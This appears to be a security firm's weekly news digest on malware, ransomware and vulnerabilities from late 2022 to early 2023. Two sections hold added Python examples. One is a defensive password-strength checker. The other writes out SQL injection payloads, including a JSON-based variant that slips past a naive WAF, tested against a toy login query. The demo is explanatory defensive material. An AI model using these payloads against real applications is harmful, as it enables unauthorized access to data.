In recent months, much has been written about the pros and cons of tools such as ChatGPT. Because of its popularity among many people and organizations, the tool has also become attractive to cybercriminals. They have introduced a rogue browser extension called Chat GPT for Google. This rogue extension aims to capture Facebook session cookies in order to gain access to accounts. These accounts are then used to promote rogue activities, ranging from paid likes to ISIS propaganda. The extension has now been taken offline, but the advice remains to be wary of this type of extension.

Increasingly, the Android banking trojan Nexus is being used by cyber criminals to attack financial login portals and applications to commit fraud. Nexus provides all the key features to perform account takeover attacks against banking portals and cryptocurrency services, such as stealing user data and intercepting text messages. Source code suggests that functionalities are likely still under development. One of these functionalities appears to be encryption, which may indicate a future ransomware module.

IcedID, also known as BokBot, began as a banking trojan in 2017. This trojan is also capable of delivering additional malware, including ransomware. Multiple groups have been spotted deploying two new variants of this malware. One of the new versions is a lite version that was previously flagged as a follow-up payload of the Emotet malware. A forked variant of IcedID was also discovered in February 2023. Remarkably, these new versions omit the web injection and backconnect functionality normally used for bank fraud. Most likely, the modified variants are meant to move the malware away from the typical banking trojan and bank fraud role and focus it on payload delivery, which likely includes ransomware delivery.

A new ransomware group called “Dark Power” has emerged. The group claims to have already made 10 victims in its first month. The Dark Power payload was written in Nim, a cross-platform programming language. Nim is growing in popularity among cybercriminals because it is still considered a niche choice, which makes the payload less likely to be detected by a large portion of cybersecurity solutions.

#WakeUpWednesday March 22, 2023

A new botnet, called HinataBot, aims to infect Realtek SDK devices, Huawei routers and Hadoop YARN servers in order to abuse these devices for large DDoS attacks. Akamai researchers have examined several samples since early this year and found that the malware is under active development. After devices are infected, the malware runs in the background, waiting for commands from the command-and-control server. The malware spreads by brute-forcing SSH endpoints or by using infection scripts and RCE payloads for known vulnerabilities.

Emotet originated as a banking trojan with the goal of accessing remote devices and capturing private data. Emotet was spread via macros in infected Microsoft Word and Excel files sent as e-mail attachments. To circumvent security measures such as the blocking of macros, OneNote attachments are currently being used for distribution. Therefore, it remains important to be alert and not open attachments from unknown senders that require macros to be activated.

Various vulnerabilities have recently been found in Samsung Semiconductor’s Exynos Modems. Several Samsung smartphones are also affected. An update for the vulnerabilities is expected soon. Until then, we recommend using the workaround.

#WakeUpWednesday March 15, 2023

In this WakeUpWednesday, we will discuss different types of malware and the ways in which they are deployed. This could include exfiltrating data or initiating a ransomware attack. BATLOADER malware is a loader that takes care of distributing a next step, such as data-stealing software, banking malware, Cobalt Strike or ransomware. Currently, BATLOADER abuses Google Ads to deliver secondary payloads such as Vidar Stealer and Ursnif. According to cyber security firm eSentire, the malicious ads are used to spoof a large number of legitimate apps and services, such as Adobe, OpenAI’s ChatGPT, Spotify, Tableau and Zoom.

Furthermore, HYAS researchers have developed a proof-of-concept of polymorphic malware that uses OpenAI’s API to evade detection. The malware has been named BlackMamba by the researchers. BlackMamba is a keylogger that comes as an apparently innocuous file. Once executed, however, the malware contacts OpenAI and prompts the AI to generate keylogging code. The dynamically generated code is then executed within the context of the benign program, leaving the malicious polymorphic part completely in memory. Each time BlackMamba is executed, the keylogging capability is resynthesized.

Alertness remains important, even when it comes to seemingly innocuous recruitment requests on LinkedIn. Among others, a suspected North Korean group is approaching security researchers with nonexistent job postings, using three new customized malware families. The cybercriminals use social engineering to trick their target into continuing the conversation via WhatsApp, where the malware “PlankWalk,” a C++ backdoor, is delivered. This backdoor helps the cybercriminals gain a foothold within the victim’s corporate environment.

Finally, attention is warranted for the Fortinet RCE vulnerability. This vulnerability is a heap buffer underflow in the FortiProxy administrative interface that allows an unauthorized attacker to execute arbitrary code and/or perform a DoS on the GUI.

#WakeUpWednesday March 8, 2023

In a separate cybersecurity advisory, the FBI and the Cybersecurity & Infrastructure Security Agency (CISA) are coming out with recommendations to prevent a ransomware attack. This is because several organizations in vital sectors have been targeted by Royal ransomware attacks over the past six months. In many cases, the attackers got in via RDP (Remote Desktop Protocol) and phishing. Key recommendations include basic measures such as: making offline, encrypted backups, disabling unused ports on systems that access the Internet, updating applications and systems, applying network segmentation and using multifactor authentication.

Many organizations use cloud solutions and containers. A sophisticated attack campaign called ScarletEel targets these container environments for theft of proprietary software and user data. The original infection was based on exploiting a vulnerable public service in a self-managed Kubernetes cluster on Amazon Web Services. In addition to stealing proprietary software and user data, the attack also included the deployment of cryptominers.

The package Colourfool is a malicious Python package uploaded to the Python Package Index (PyPI). This package contains an infostealer and a remote access trojan. It is part of a new malware called Colour-blind, identified by Kroll’s cyber threat intelligence team. Colour-blind illustrates the democratization within cybercrime and can lead to an intensification of the threat landscape by allowing multiple variants to emerge from the code of others.

Furthermore, on Feb. 14, 2023 during Patch Tuesday, Microsoft published updates describing CVE-2023-21716. This vulnerability is a heap corruption vulnerability in Microsoft Word’s RTF parser. When exploited, it allows an unauthorized attacker to execute arbitrary code with the victim’s privileges. A proof-of-concept exploit was published on March 5, 2023. Microsoft has published patches and a number of workarounds. The advice is to implement mitigating measures.

Finally, it is important to stay alert for UEFI malware. BlackLotus is the first example where the malware is able to bypass the Secure Boot mechanism. This makes it possible to infect even fully patched Windows 11 systems. The malware can be used to disable BitLocker, Microsoft Defender Antivirus and Hypervisor-protected Code Integrity (HVCI), also known as the Memory Integrity feature that protects against attempts to abuse the Windows kernel.

#WakeUpWednesday March 1, 2023

Privacy regulators have published guidelines aimed at making the use of social media safer. In these guidelines, the European privacy regulators, also known as the EDPB, describe how to recognize and prevent so-called dark patterns. These rules are meant to tell both users and social media designers what to look out for when they see certain types of buttons, texts and colors that try to steer the user into a choice and hand over their personal data.

The PlugX Trojan is a real wolf in sheep’s clothing. It pretends to be a Windows Debugger Tool called x64dbg, but is designed to bypass security and take control of the system. PlugX is also known as Korplug and is known for various functionalities such as data exfiltration and abuse of infected devices.

LastPass is a password manager where users store passwords. It has just been revealed that login credentials were stolen from a senior DevOps engineer. The investigation in August of last year showed that the cybercriminals had initially captured only source code and other technical information. Now it appears that cloud backups were also stolen. LastPass suffered multiple security incidents last year.

Finally, the police are going to intensify the use of technology in facial recognition in the future. Minister of Justice and Security Yesilgöz indicated that facial recognition technology should not be taken lightly. Initially, it had been decided in 2019 by the then Minister of Justice and Security that the technology should not be used operationally. Since then, the police have been working on a report to answer legal, ethical and technical issues for the operational deployment of facial recognition.

#WakeUpWednesday February 22, 2023

Patching is and will continue to be essential to reduce the risk of a security incident. Fortinet has released updates for 40 vulnerabilities in FortiWeb, FortiOS, FortiNAC and FortiProxy, among others. Two of the vulnerabilities are considered critical and 15 are considered high-risk vulnerabilities. The most urgent vulnerability is CVE-2022-39952, with CVSS score 9.8. We recommend installing the updates as soon as possible.

Forescout researchers have released two new vulnerabilities regarding Schneider Electric Modicon PLCs. These vulnerabilities can allow authentication bypass and remote code execution by an unauthorized person. The released vulnerabilities are part of a larger set. Successfully exploiting these vulnerabilities can enable a cybercriminal to execute code, cause a denial of service or capture (and publish) sensitive information.

The importance of timely patching is also evidenced by a new malware called ProxyShellMiner that exploits Exchange vulnerabilities already disclosed in 2021. These vulnerabilities, known as ProxyShell, are now being used by ProxyShellMiner to mine cryptocurrency within a Windows domain. Updates for the ProxyShell vulnerabilities have been available for some time. Morphisec’s blog provides guidance on how to stop ProxyShellMiner.

#WakeUpWednesday February 15, 2023

Responding adequately to critical vulnerabilities is one of the fundamental measures to ensure cybersecurity. For example, a critical vulnerability reported in 2022 for TerraMaster NAS systems is currently being exploited. This vulnerability allows cybercriminals to remotely retrieve the administrator password and use it to log in. Security updates were already released in March and April of last year. The advice is to install these as soon as possible.

In addition, a warning has also been issued by CISA (the U.S. Cybersecurity & Infrastructure Security Agency) about the abuse of vulnerabilities such as Log4j, in addition to the TerraMaster vulnerability mentioned earlier. These vulnerabilities are currently being widely exploited to carry out ransomware attacks on critical infrastructure.

Furthermore, the Clop ransomware group claims that by exploiting the GoAnywhere vulnerability CVE-2023-0669, it has now victimized 130 organizations. A patch is available; the advice is to install it as soon as possible. If vulnerabilities cannot be fixed in the short term, it is important to ensure that proper network detection is in place and that, in the event of an alert, there is a quick and appropriate response.

Microsoft on Tuesday released security updates for 75 vulnerabilities, three of which are currently being actively exploited. We advise installing these patches as soon as possible.

Finally, Proofpoint reports a new threat group that has been targeting primarily U.S. and German organizations since October 2022. This group, called Screentime (TA866), likely has a financial motive and focuses on stealing confidential information. Various methods are used to enter an organization. Regardless of the method used, running the downloaded JavaScript file leads to an MSI installer. This extracts a VBScript called WasabiSeed, which functions as a tool to retrieve next-stage malware from a remote server. One of the utilities that WasabiSeed downloads is Screenshotter. This utility periodically takes screenshots of the victim’s desktop and sends them to a command-and-control (C2) server. To reduce the risk, you can already take some measures yourself: make sure VBScript execution is off by default and make sure your employees are aware of the potential risks.

#WakeUpWednesday February 8, 2023

A new, flexible tool to easily initiate DDoS attacks using the Passion botnet is currently being circulated by the hacker group Passion. For a fixed monthly fee, a cybercriminal can customize the attack by choosing from one of the 10 attack vectors offered. In addition, the duration and intensity per attack can also be customized. This combination and customizability makes it more difficult for victims to mitigate these DDoS attacks.

A zero-day vulnerability has been disclosed for GoAnywhere MFT file transfer, a Fortra solution that facilitates secure file sharing. The attack vector of this vulnerability requires access to the application’s administrative console, which in most cases can only be accessed from a private corporate network, via VPN, or by whitelisting IP addresses (when running in cloud environments, such as Azure). No patch is currently available. As a mitigating measure, it is advised to temporarily disable or remove servlet and servlet mapping.

Atlassian’s Jira Service Management Server and Data Center also face a critical vulnerability where unauthorized individuals can gain access. An update is available. The advice is to install it as soon as possible.

#WakeUpWednesday February 1, 2023

QNAP has released an update regarding a critical vulnerability in the operating system of its NAS systems. Cybercriminals exploiting this vulnerability can remotely execute malicious code. The advice is, if your organization uses these NAS systems, to update these systems as soon as possible.

Last week VMware released a patch for a number of critical vulnerabilities in VMware vRealize Log Insight. Two of the patched vulnerabilities score 9.8 on a scale of 1 to 10 and can be used by cybercriminals in relatively simple attacks and without requiring user interaction. The need to patch has become even greater as researchers are about to release both exploit code and a POC in the near future. Should patching not be possible, we recommend at least taking mitigating measures.

Currently, an updated version of the SwiftSlicer wiper is being deployed to destroy Windows domains. A characteristic of wiper malware is that if data is destroyed it cannot be recovered. Unlike ransomware, where there is still a possibility of recovery through decryption, data hit by a wiper is truly destroyed. SwiftSlicer thereby focuses on overwriting crucial files in the Windows operating system. Currently, the wiper seems to be deployed primarily against systems in Ukraine. Because malware does not let national borders stop it, alertness is called for.

Malware spreads in a variety of ways, including via USB sticks. Researchers have discovered a new version of the PlugX malware spread via USB sticks. This PlugX variant behaves like a worm and infects USB devices in such a way that it hides itself from the Windows file system. This makes it impossible for a user to notice that their USB device is infected or potentially being used to exfiltrate data from the network.

#WakeUpWednesday January 25, 2023

Cybercriminals use a variety of ways to get into organizations. Common ways include exploiting critical vulnerabilities, using phishing emails or taking advantage of a vulnerability at a supply chain partner.

Rapid7 reports that cybercriminals are currently actively exploiting a critical vulnerability in several Zoho ManageEngine products. A total of 24 different solutions are vulnerable, including Access Manager Plus, PAM 360, Password Manager Pro and ServiceDesk Plus. Patches have been available since late October 2022; the advice is to install them as soon as possible.

Emails with rogue Word or Excel attachments to install and spread malware have become less popular since Microsoft set macros to be disabled by default. Then came variants with ISO and 7-ZIP files. Nowadays, we see cybercriminals more frequently using OneNote attachments in phishing emails to infect victims with malware or steal passwords. OneNote attachments also require user action to trigger the malware. The system does show a warning that the attachment is potentially malicious; however, many users click this warning away.

Last week a lot happened in the field of ransomware. An overview of the various reports and developments, such as new variants of STOP ransomware and VoidCrypt, as well as information about a decryptor for BianLian can be found here. In addition, Cyberveilig Nederland has published a whitepaper on data exfiltration. The goal of the whitepaper is to gain insight into data exfiltration, create awareness and provide action perspectives.

#WakeUpWednesday January 18, 2023

Updating software is an important way to reduce the risk of a cyber incident. Recently, there have been several publications to warn about a vulnerability in FortiOS SSL-VPN. This vulnerability is being actively exploited by cybercriminals. In particular, government agencies or organizations related to them seem to be attacked by the criminals. A patch is now available; the advice is to install it as soon as possible.

Furthermore, a Proof of Concept (POC) has been published for a number of critical vulnerabilities in popular WordPress plugins. These include vulnerabilities that enable SQL injections. The vulnerabilities found are in the plugins Paid Memberships Pro, Easy Digital Downloads and Survey Marker. A vulnerability in Control Web Panel (formerly known as CentOS Web Panel) is also currently being actively exploited by cybercriminals. This tool is used for managing servers. Patches are available for both the WordPress plugins and the Control Web Panel vulnerability.

Cybercriminals keep coming up with new ways to stay under the detection radar. In this case, they are using a combination of polyglot files and rogue Java archive (JAR) files to spread remote access trojans such as StrRAT and Ratty. Polyglot files are files that combine the syntax of two or more different formats in such a way that each format can be parsed without error.

Finally, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of several vulnerabilities in Industrial control systems from Siemens, GE Digital and Contec.

#WakeUpWednesday January 11, 2023

A large proportion of employees use a smartphone for business purposes. That makes smartphones a desirable target for cybercriminals as well. There have been noticeably more detections of the Android malware SpyNote, also known as SpyMax. After the source code of SpyNote became publicly available through one of the latest variants, called CypherRat, several variants have been developed. Financial institutions in particular seem to be victims of SpyNote. SpyNote combines spyware with banking malware functionality by, for example, requesting accessibility service permissions in order to read two-factor authentication codes from Google Authenticator and record keystrokes to take over banking credentials.

As an increasing number of different devices are used by employees within organizations, it makes sense to set up monitoring on the different devices (endpoints) as well via an Endpoint Detection and Response solution.

Research indicates that a variant of the Dridex malware targets macOS systems. This employs a new technique to deliver documents containing malicious macros to users. Although Dridex often masquerades as invoices or other business-related files, that is not necessarily the case here. In fact, this version of Dridex overwrites all .doc files in the current user folder and adds the malicious macro’s code there. In this way, Dridex tries to circumvent the automatic blocking of macros by nesting in files where they might be allowed. Because the code of this macro attempts to download and open an .exe, the impact for macOS users is minimal because macOS does not support an .exe extension. However, users may still unknowingly spread this malicious macro when sharing infected files with other (Windows) users.

The legitimate Windows error reporting tool WerFault.exe is also currently being abused by cybercriminals to load malware into the memory of a compromised system via DLL sideloading: a malicious DLL placed next to WerFault.exe is loaded by the trusted, signed binary. The malware resides in an ISO file that is sent to the victim as an email attachment, and the infection starts when the victim opens the shortcut inside the ISO.

In the background, a remote access trojan is installed that gives the attacker full access to the infected system. The attacker can then remotely steal data, execute commands and/or move laterally to adjacent systems, among other things.

#WakeUpWednesday December 21, 2022

In this last #WakeUpWednesday of 2022, we have news about ransomware. Leiden University's employment agency has been hit by a ransomware attack. Cybercriminals encrypted important data and documents containing citizen service numbers (BSN), name and address information, employment contracts and salary documentation. How the cybercriminals got in, who is behind the attack and whether a ransom will be paid has not been disclosed.

Google announced that Gmail will additionally be secured with client-side encryption. This new feature, currently still in beta, ensures that the email body and attachments are encrypted before they reach Google's servers, so Google cannot read them. You do have to sign up for the beta. After signing up, it is available to organizations using Google Workspace Enterprise Plus, Education Plus and Education Standard.

Cybercriminals entered Ukrainian government networks with trojanized Windows 10 ISO files. Disguised as legitimate Windows 10 installation media, the ISOs infected the computer during installation with malware capable of stealing data.

More on malware: Microsoft warns about a new botnet called 'MCCrash', which infects Windows, Linux and IoT devices and is used for DDoS attacks on Minecraft servers, a common target for attackers who want to thwart or extort players. Microsoft reveals that the malware initially infects systems after users install pirated Windows and Microsoft Office activation tools. It then attempts to spread across the network through SSH brute-force attacks on Linux and IoT devices.

#WakeUpWednesday December 14, 2022

Software vendors release updates to fix bugs and vulnerabilities. An active patch policy is one of the essential ways to minimize the risk of a cyber incident. Yet thousands of Pulse Connect Secure VPN servers are still not up to date, and cybercriminals are exploiting known vulnerabilities dating from 2018 and 2019 on servers where the security updates were never installed.

The healthcare industry has recently been the subject of targeted Royal ransomware attacks. After news of attacks that left French and Colombian hospitals unable to operate, it has just been announced that U.S. hospitals are now being targeted as well. The U.S. Department of Health and Human Services is warning about Royal ransomware. This group is known to encrypt files with a .royal extension and to demand payments ranging from 250 thousand to 2 million US dollars.

More about ransomware. Recently, the city of Antwerp was the victim of a ransomware attack. The city did not release details, but told Belgian media that it could take until the end of this month to bring its digital services back online. The group responsible, Play, has already demanded a ransom. According to the cybercriminals, they hold at least 557 gigabytes of data, including financial documents, identity cards, passports and other personal data. If the ransom is not paid by December 19, the stolen data will be published. The ransom amount has not been disclosed. Play has carried out successful attacks before, including in Switzerland, Bulgaria, the United States, Argentina and Canada.

Yesterday we told you about the FortiOS heap-based buffer overflow vulnerability (CVE-2022-42475). The vulnerability is located in the FortiOS SSL-VPN and gives an unauthenticated attacker the ability to execute code remotely. You can track this vulnerability via our blog, which we will update when there is news.

A new attack technique has come to light that aims to bypass web application firewalls (WAFs). By adding JSON syntax to an SQL injection payload, signature-based WAFs that do not understand JSON operators fail to recognize the injection, while the database happily evaluates it. Businesses in particular suffer, because this allows attackers to reach sensitive business and customer information. The technique is all the more relevant as organizations move more business data and functionality to the cloud, where a WAF is often the main protective layer in front of the application.
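The following added example (not code from the original post or from the research it summarizes) illustrates the idea with a toy WAF and an SQLite database. The toy rules only catch textbook tautologies such as `' OR 1=1`; the JSON-flavored payload, which uses SQLite's `json_extract` function to produce a true condition, passes the filter but still succeeds against a query built by string concatenation. The parameterized variant is unaffected by either payload. The user table, the rules and both payloads are constructed for this example:

```python
import re
import sqlite3

# Toy signature set of the kind a naive WAF rule author writes: numeric tautologies,
# UNION-based injection and "OR TRUE". It knows nothing about JSON functions or operators.
NAIVE_WAF_RULES = [
    re.compile(r"'\s*or\s+'?\d+'?\s*=\s*'?\d+", re.I),  # ' OR 1=1 , ' OR '1'='1
    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),  # UNION SELECT
    re.compile(r"\bor\s+true\b", re.I),                  # OR TRUE
]

CLASSIC_PAYLOAD = "x' OR 1=1 OR 'x'='y"
# Same logical effect, but the true condition is produced by a JSON function call
# that the rules above never look for.
JSON_PAYLOAD = "x' OR json_extract('{\"ok\":1}','$.ok')=1 OR 'x'='y"


def waf_blocks(value):
    """Return True if the toy WAF would reject this input."""
    return any(rule.search(value) for rule in NAIVE_WAF_RULES)


def setup_db():
    """Constructed sample database with one user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users (name, pw) VALUES ('alice', 'correct horse')")
    return conn


def vulnerable_login(conn, name, pw):
    """Login check built by string concatenation: the input becomes part of the SQL."""
    sql = f"SELECT id FROM users WHERE name='{name}' AND pw='{pw}'"
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, name, pw):
    """Same check with bound parameters: the input is data, never SQL syntax."""
    sql = "SELECT id FROM users WHERE name=? AND pw=?"
    return conn.execute(sql, (name, pw)).fetchone() is not None


if __name__ == "__main__":
    db = setup_db()
    for label, payload in (("classic", CLASSIC_PAYLOAD), ("json", JSON_PAYLOAD)):
        print(label, "blocked by WAF:", waf_blocks(payload),
              "bypasses vulnerable query:", vulnerable_login(db, "alice", payload),
              "bypasses parameterized query:", safe_login(db, "alice", payload))
```

The lesson is the one from the research: a WAF is a compensating control whose signatures lag behind the SQL dialect, so the fix that actually holds is parameterized queries in the application, with the WAF as defense in depth.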

#WakeUpWednesday December 7, 2022

A computer infected with malware is bad enough. But this new malware also steals files from smartphones and other devices connected to the infected computer as removable storage. The malware, named "Dolphin", searches connected devices for documents, certificates, emails and media files. In addition, it logs keystrokes, takes a screenshot every 30 seconds, and extracts passwords and cookies from the browser. The stolen data is then uploaded to Google Drive.

Google Chrome has had several zero-day vulnerabilities disclosed recently. The most recent is CVE-2022-4262, a type confusion bug in the V8 JavaScript engine that allows attackers to execute code in the context of the browser. Google's Threat Analysis Group also recently described the Heliconia exploitation framework of the Spanish spyware vendor Variston, which targeted Chrome as well as Microsoft Defender (CVE-2021-42298) and Mozilla Firefox (CVE-2022-26485) to infect Windows and Linux computers.

Ransomware remains a hot topic. Such a ransomware attack can come about in a variety of ways. The most common ways are unpatched critical vulnerabilities and abuse of existing user accounts. It is therefore important to have multifactor authentication (MFA) enabled and use a strong password. A short time ago, we provided 8 tips for creating a secure password.

In most cases, a ransomware attack is a time-consuming, annoying and costly event. When it happens in critical industries, lives may even be at stake. Following a ransomware attack in Colombia in which entire hospital data was encrypted, now a hospital in France must also cancel operations due to a cyber attack. Do you want to prevent a successful ransomware attack? Then make sure you get the basics right.

LastPass lets you manage and store passwords. Yet, using information obtained in a previous breach, cybercriminals managed to access a third-party cloud storage service used by LastPass and captured data from it. LastPass states that vault data is stored encrypted, so it is unlikely that passwords were leaked. LastPass remains operational and is investigating the incident.

A few days ago, a new version of the VLC media player was released that fixes several vulnerabilities. On a number of Windows installations, however, the built-in updater reports that no new version is available, leaving users on a vulnerable version. If automatic updating does not work, update VLC manually.

The Cybersecurity and Infrastructure Security Agency (CISA) released an Industrial Control Systems advisory this week warning of several vulnerabilities in Mitsubishi Electric GX Works3 engineering software. This software is used in industrial control systems to upload programs to and download programs from PLCs. By exploiting the vulnerabilities, cybercriminals can view and even modify modules and programs. The most critical vulnerabilities are CVE-2022-25164 and CVE-2022-29830.

#WakeUpWednesday November 30, 2022

Google Chrome is the most widely used desktop browser worldwide, with a 77.03% share (source: Kinsta.com). That makes it an attractive target for cybercriminals. In the run-up to Black Friday, Google fixed a zero-day vulnerability for the eighth time this year, and indicated that exploit code for this critical vulnerability is already in circulation. An update is available. Modern browsers update automatically by default unless the user has turned this off. Make sure you know which applications are in use in your IT landscape and whether they are up to date.

Researchers at ESET describe a method by which cyber criminals integrate malware into VPN applications. One example is adding malware to the legitimate OpenVPN Android app, then presenting it to users in an alternative way. Researchers say this malware targeted contact information, call logs from Facebook Messenger, WhatsApp, Signal, Viber and Telegram, among others, and other information available on the cell phone. These rogue applications were not available through the Google Play store. Make sure your users obtain or are made available business applications through a reputable source at all times.

We'll stick with Android phones for a while, because rogue apps sometimes slip through the cracks of the Google Play Store as well. Bitdefender researchers discovered, among others, a rogue file manager app that aims to infect the phone with further malware. The file manager asks the user for permission to download external files, supposedly for an app update, but misuses that permission to download malware. One of these rogue file managers, "X-File Manager", had been downloaded more than 10 thousand times. The "update" is an APK containing the SharkBot banking malware, which targets financial apps in order to intercept login credentials or covertly steal money.

The data of 5.4 million Twitter users has leaked. The underlying vulnerability in the platform was fixed last January, but in July the data of 5.4 million Twitter users was offered for sale on a marketplace for 30 thousand dollars, and the data set has since been made available for free on that forum. It consists of a combination of public information and private data, such as Twitter IDs, names, login names, locations, email addresses and phone numbers. It is also rumored that a larger data set of more than 10 million users exists. The data is ideally suited for targeted phishing campaigns, so be wary of emails that appear to come from Twitter.

#WakeUpWednesday November 23, 2022

The Netherlands is a country with a strong digital focus. Over the past couple of years, attention to doing business online has increased, and cyber security has become a topic of major importance for large and small companies alike. The government is making plans to support small and medium-sized businesses in bringing their cyber security to the next level: by 2030 every small and medium-sized business should have reached a basic level of digitalization.

This digital adaptation would place the Netherlands among the top three in Europe when it comes to digital technologies. Moreover, these measures are good preparation for the implementation of the revised European Network and Information Security Directive (NIB2) also known as NIS2.

Tomorrow is national "Change Your Password" day. Take some time that day to look critically at your passwords and change them where needed. Many of today's passwords are not safe enough. The five most commonly used passwords are: 123456, Qwerty, 123456789, welcome and password. Tomorrow we will publish an article with guidelines for creating a safer password.

As stated earlier, data is the new gold. If you use the same password for multiple accounts, you run the risk of having your account data traded by cybercriminals on the various marketplaces out there on the Dark net.

Cybercriminals are becoming creative, and therefore dangerous. A ransomware campaign was recently discovered that starts with a Google service: Microsoft warns that cybercriminals are using Google Ads (malvertising) to lure users to downloads that deliver various payloads. The loader involved is known as BATLOADER. The Microsoft Security Threat Intelligence team reveals that this loader is being used to spread Royal ransomware.

Another malware threat is the WASP Stealer, also known as W4SP Stealer. This malware is part of a software supply chain attack that targets Python developers through malicious packages on PyPI. The installed packages are capable of stealing Discord accounts, passwords, crypto wallets, credit card information and other sensitive data, which is then exfiltrated via a Discord webhook.

In addition, we see that a new version of Typhon Stealer is active, called Typhon Reborn. Both versions have the capacity to steal crypto wallets and bypass antivirus software.

Kaspersky research has revealed that cybercriminals have found a way to steal user data on Android devices via a VPN app. This spying campaign is called SandStrike: the VPN app offered to victims contains advanced spyware. To lure people into downloading the app, various social media accounts were used.

#WakeUpWednesday November 16, 2022

For local authorities, cyber security is a hot topic, and more and more organizations and authorities are taking measures to improve their information security. The Ministry of Health, Welfare and Sport wants to extend Z-CERT. Currently, Z-CERT serves hospitals and mental health institutions; in time, the entire healthcare sector should be able to use the service.

In the area of critical vulnerabilities, vigilance continues to be required. A serious vulnerability has just surfaced that affects ABB TotalFlow computers and controllers. These are widely used within the oil and gas industry. Cybercriminals can use the vulnerability to remotely take control of devices. In addition, they can read, write and overwrite files.

Organizations are still at great risk from weak passwords. The password "Welcome123", or a variation of it, is still being used internally at companies. A newly discovered malware takes advantage of exactly that. KmsdBot, as Akamai's team calls it, uses Secure Shell (SSH) to gain access to systems in order not only to mine cryptocurrency but also to carry out DDoS attacks. It targets different types of businesses, ranging from gaming to luxury car brands, and infects systems over SSH using weak login credentials.
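"Welcome123 or a variation of it" is the important phrase: a denylist that only contains the literal string is bypassed by "W3lc0me!2022". The added example below, which is not code from the original post or from Akamai's research, normalizes a candidate password (case, leet-speak substitutions, trailing and leading digits and symbols) before comparing it with a small constructed base-word list, so that the usual variations are caught as well. The base-word list and the thresholds are constructed for this example; in practice you would check against a large breached-password corpus.

```python
import re

# Constructed, deliberately short list of base words; real deployments use a breach corpus.
BASE_WORDS = {"welcome", "password", "admin", "qwerty", "letmein", "summer", "winter"}

# Common leet-speak substitutions undone before comparison.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s", "!": "i"})

MIN_LENGTH = 12


def normalize(password):
    """Lowercase, strip leading/trailing digits and symbols, then undo leet-speak.
    'W3lc0me!2022' -> 'welcome', 'P@ssw0rd1' -> 'password'."""
    p = password.lower()
    p = re.sub(r"[^a-z@$!0-9]+$", "", p)        # trailing punctuation such as '!!'
    p = re.sub(r"[0-9!@$#%^&*()_+\-=.,]+$", "", p)  # trailing digits/symbols: 123, 2022, !
    p = re.sub(r"^[0-9!@$#%^&*()_+\-=.,]+", "", p)  # leading digits/symbols
    return p.translate(LEET)


def assess(password):
    """Return a list of findings; an empty list means no weakness was detected."""
    findings = []
    base = normalize(password)
    if not base:
        findings.append("only digits or symbols")
    elif base in BASE_WORDS:
        findings.append("dictionary variant of '%s'" % base)
    if len(password) < MIN_LENGTH:
        findings.append("shorter than %d characters" % MIN_LENGTH)
    if re.fullmatch(r"(.)\1*", password) or password.lower() in ("123456", "123456789"):
        findings.append("trivial sequence")
    return findings


if __name__ == "__main__":
    for candidate in ("Welcome123", "W3lc0me!2022", "P@ssw0rd1", "correct-horse-battery-staple-9"):
        print(candidate, "->", assess(candidate) or "ok")
```

Running the same normalization against the credential list a bot like this one sprays (typically a few hundred defaults and their variations) during onboarding or a periodic audit is cheap, and it is a far better use of effort than hoping SSH password authentication is never exposed; the stronger fix remains key-based authentication with passwords disabled.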

Last but not least, last week there were two updates around critical vulnerabilities. The blog around ProxyNotShell has been updated and a new blog around vulnerabilities in Citrix Gateway has been published.

#WakeUpWednesday November 9, 2022

Ransomware is unfortunately a topic that will haunt us more and more. According to the latest report by U.S. federal and financial authorities, there were 487 reported ransomware incidents in 2020, but 1,489 in 2021. All attacks targeted Windows systems. Companies also paid more for their data: 416 million dollars in 2020 and 1.2 billion dollars a year later.

More news about ransomware: the Dutch Minister of Justice and Security announced it will be possible to file a police-report for ransomware attacks before the end of the year. At this moment it is only possible to file police-reports in cases such as an online scam, phishing, or WhatsApp scam.

This past week it became clear that Checkmk had multiple vulnerabilities in its software. Checkmk is used for monitoring IT infrastructure such as networks, databases, storage and servers. Chained together, the vulnerabilities allow an attacker to take over the monitoring server without authenticating, which means they can do serious damage from a system that has visibility into the entire infrastructure.

November is Black Friday month. On November 25, many stores offer discounts. For consumers Black Friday is a delight, but for IT departments it is a time of challenges, with a massive volume of online purchases, orders and payments. Be alert to suspicious emails, text messages or WhatsApp messages about the status of your order.

#WakeUpWednesday November 2, 2022

Understanding what devices and software are being used within an organization is essential for efficient and effective patching policies. In this #WakeUpWednesday we focus on a number of critical vulnerabilities where patching is desired as soon as possible.

The NCSC has published an overview of products that use OpenSSL. OpenSSL is used to encrypt network connections and, like Log4j before it, is a component embedded in a very large number of products. The vulnerability only affects the OpenSSL 3.0 series; versions below 3.0 are not affected.

On Oct. 12, 2022, Juniper Networks published a security advisory describing six different vulnerabilities in the Juniper Networks Junos J-Web interface. In our blog more details about these vulnerabilities.

Previously, we have shared information surrounding the Magniber ransomware and the exploitation of the Mark-of-the-Web zero-day in Windows 10 and 11. Meanwhile, an unofficial update is available.

In addition, an update is available for a critical vulnerability in VMware Cloud Foundation and NSX Manager appliances. Because proof-of-concept exploit code is available for this vulnerability, the likelihood of an attack is high. An update is available, we recommend installing it as soon as possible.

Finally, ConnectWise has made an update available for a critical vulnerability in ConnectWise Recover and R1Soft Server Backup Manager solutions. The vulnerability allowed attackers to access data or execute code remotely.

#WakeUpWednesday October 26, 2022

Getting the deployment of technology right, combined with the correct mindset of employees and setting up the necessary processes, is essential to your cybersecurity. Also in this #WakeUpWednesday, we see cybercriminals using a combination of techniques to penetrate organizations. Cybercriminals then capture data and/or launch a ransomware attack.

Last week, an update was posted around the ProxyRelay vulnerability. Read our blog for more info.

Besides Microsoft Windows users, Cisco ISE is also affected by a remote code execution vulnerability in Windows. Successful exploitation within ISE does require authenticated access to the management interface.

Synology's DiskStation Manager (the operating system of its NAS devices) currently contains three critical vulnerabilities, all rated with a CVSS score of 10. By exploiting these vulnerabilities, an attacker can execute arbitrary commands on the NAS. An update is available; the recommendation is to install it as soon as possible.

VMware Cloud Foundation users are also advised to update because of a remote code execution vulnerability in the bundled XStream library.

Because employees today often work both at home and in the office, and home devices are also used for work purposes, cybercriminals are targeting Windows Home users through a specific campaign. Cybercriminals advertise fake antivirus and security updates for Windows 10 that actually contain Magniber ransomware.

